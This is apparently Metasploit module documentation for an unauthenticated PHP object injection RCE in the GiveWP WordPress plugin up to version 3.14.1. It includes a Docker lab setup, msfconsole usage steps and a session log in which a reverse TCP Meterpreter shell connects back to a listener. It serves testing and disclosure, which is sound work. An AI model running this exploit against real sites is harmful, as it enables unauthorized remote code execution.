## Vulnerable Application

This Metasploit module exploits an unauthenticated PHP Object Injection vulnerability in the
GiveWP plugin for WordPress (versions <= 3.14.1).
The vulnerability is present in the 'give_title' parameter, allowing attackers to inject a crafted
PHP object leading to remote code execution (RCE) when combined with a suitable POP chain.

## Setup

1. **Docker Compose Setup**: Create the following `docker-compose.yml` file to set up a vulnerable WordPress environment:

```yaml
services:
  db:
    image: mysql:8.0.27
    command: '--default-authentication-plugin=mysql_native_password'
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=somewordpress
      - MYSQL_DATABASE=wordpress
      - MYSQL_USER=wordpress
      - MYSQL_PASSWORD=wordpress
    expose:
      - 3306
      - 33060

  wordpress:
    image: wordpress:6.3.2
    ports:
      - "80:80"
    restart: always
    environment:
      - WORDPRESS_DB_HOST=db
      - WORDPRESS_DB_USER=wordpress
      - WORDPRESS_DB_PASSWORD=wordpress
      - WORDPRESS_DB_NAME=wordpress
volumes:
  db_data:
```
1. Run Docker: `docker compose up`
1. Access the WordPress instance at `http://127.0.0.1` and complete the installation process
1. **Download and Install Vulnerable GiveWP Plugin**:
- Download the plugin: [GiveWP 3.14.1](https://downloads.wordpress.org/plugin/give.3.14.1.zip)
- Unzip the plugin and copy it to the Docker container:
```bash
docker compose cp give wordpress:/var/www/html/wp-content/plugins
```
- Access the WordPress instance at `http://localhost` and activate the GiveWP plugin via the admin dashboard.

1. **Create a Donation Form**:
  - Navigate to the "Forms" section within the GiveWP plugin and click on "Add Form."
  - Select any form.
  - Configure the form as needed, publish it.

## Options

No specific options need to be configured.

## Verification Steps

1. Start `msfconsole`.
2. Use the module with `use exploit/multi/http/wp_givewp_rce`.
3. Set `RHOSTS`, `RPORT`, and the necessary WordPress-specific options.
4. Run the exploit.
5. Gain a Meterpreter session.

## Scenarios

### GiveWP Plugin version: 3.14.1 (Dockerized WordPress Version 6.3.2)

Using `cmd/linux/http/x64/meterpreter/reverse_tcp`:

```bash
msf6 > use exploit/multi/http/wp_givewp_rce 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:8888

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.3.2
[+] Detected GiveWP Plugin version: 3.14.1
[+] The target appears to be vulnerable.
[+] Successfully retrieved form list. Available Form IDs: 8, 10, 13
[*] Using Form ID: 13 for exploitation.
[*] Sending stage (3045380 bytes) to 172.24.0.3
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.24.0.3:51272) at 2024-08-27 22:11:22 +0200

meterpreter > sysinfo 
Computer     : 172.24.0.3
OS           : Debian 11.8 (Linux 5.15.0-119-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```